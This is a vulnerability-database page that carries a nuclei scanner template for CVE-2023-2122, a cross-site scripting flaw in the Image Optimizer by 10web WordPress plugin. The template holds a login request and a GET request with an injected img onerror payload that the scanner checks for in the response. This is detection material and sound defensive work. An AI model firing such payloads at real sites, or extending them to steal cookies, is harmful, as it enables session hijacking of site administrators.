Lucene search
K

Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting

🗓️ 04 Jul 2026 03:00:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 31 Views

Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting. Vulnerability allows arbitrary script injection, stealing authentication credentials, and launching attacks

Related
Refs
Code
id: CVE-2023-2122

info:
  name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the iowd_tabs_active parameter to steal WordPress administrator session cookies.
  remediation: Fixed in version 1.0.27
  reference:
    - https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78
    - https://wordpress.org/plugins/image-optimizer-wd/advanced/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2122
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2122
    cwe-id: CWE-79
    epss-score: 0.0085
    epss-percentile: 0.53677
    cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 2
    vendor: 10web
    product: image_optimizer
    framework: wordpress
  tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body_2, "<img src=a onerror=alert(document.domain)>")'
          - 'contains(body_2, "Image optimizer")'
        condition: and
# digest: 4a0a00473045022076c5b53c73d7d95fccc714f3fd2dba0ca2b443e58e941ea28eeb7538ba46a901022100fc5ff43d5c79a32662fffe4cfc34ef4e05f62710bb944d66e53b42d126b3c1df:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.8Medium risk
Vulners AI Score6.8
CVSS 3.16.1
EPSS0.0085
SSVC
31